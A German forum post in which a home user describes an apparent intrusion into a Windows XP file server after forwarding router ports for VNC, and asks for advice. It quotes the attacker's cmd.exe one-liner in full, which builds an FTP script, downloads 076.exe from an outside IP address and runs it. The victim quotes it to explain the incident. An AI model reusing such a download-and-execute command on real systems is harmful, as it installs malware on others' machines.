Hallo Forum,

vll. weiß einer der Mitlesenden mir weiterzuhelfen.

Ich habe mich vorhin mal nichtsahnend an meinen PC gesetzt, den ich als Fileserver in meinem lokalen Netz eingerichtet habe (das klingt übertrieben, es ist eigentlich ein ganz normaler Rechner mit WinXP SP2, wo ich meine Dateien für das lokale Netz ablege). Das lokale Netz hängt über einen DSL-Router der traditionsreichen Firma Zyxel am Netz.

Da ich gelegentlich auch außer Haus auf meinen Rechner schauen wollte, habe ich einen VNC-Server installiert (RealVNC) und die Ports im Router an den Server weitergeleitet (hat zwar nicht geklappt aus irgendwelchen Gründen, aber war mir kein weiteren Gedanken wert). Diese Einstellung habe ich gegen 8:00 Uhr heute morgen vorgenommen. Eine Stunde später gehe ich an den Rechner und sehe, daß eine Eingabeaufforderung geöffnet ist und der Kommandozeilen-FTP-Client eine Verbindung hergestellt hat. Lädt er also gerade eine Datei namens 076.exe herunter, dachte ich mir, das darf doch nicht sein -- also STRG-C. Mit den Worten 'Happy rooting!' verabschiedet sich die Eingabeaufforderung wieder.

Unter 'Ausführen ...' fand ich dann folgende Eingabe, die definitiv nicht von mir stammt:

cmd.exe /c del i&echo open 87.105.205.104 2235 > i&echo user 1 1 >> i &echo get 076.exe >> i &echo quit >> i &ftp -n -s:i &076.exe&del i&exit

Also alle FTP-Befehle erstmal in Datei i, dann ftp.exe mit diesem Skript starten und am Ende wieder beenden. Die Datei 076.exe liegt übrigens nicht auf diesem Host, sie wurde zwar versucht auszuführen, aber es kam zu dem Fehler, daß es sich bei 076.exe nicht um eine gültige Windows-Anwendung handele.

Erstmal fragte ich mich natürlich, ob das Zufall sei, daß der Rechner komische Dinge macht, nachdem ich die Portweiterleitung aktiviert hatte -- den Port 18768 habe ich auch noch weitergeleitet, um mittels Opera Torrents herunterladen zu können. Dann fragte ich mich, ob der Rechner jetzt schon kompromittiert ist. Dazu habe ich ein wenig gegoogelt und diese Seite aufgetan, die mir leider nicht weiterhilft -- aber die Reptile-Meldung war mir mittlerweile jedenfalls schon bekannt.

Als Sofortmaßnahmen habe ich mir den Rootkitrevealer besorgt sowie eine Personal Firewall auf dem Rechner installiert. Ich hoffe, das hilft erstmal, auch wenn es gegen Rootkits wohl ein schwacher Schutz ist, wenn sie erstmal drauf sind.

Ich habe keine Ahnung, wie schlimm das jetzt ist und ob alle Leser meiner Nachricht sich nicht auch gleich infizieren ;-)

Ich danke schon mal im voraus für jedes tröstende Wort als auch für Aufklärung.

Beste Grüße aus Berlin-Lichtenberg
Masin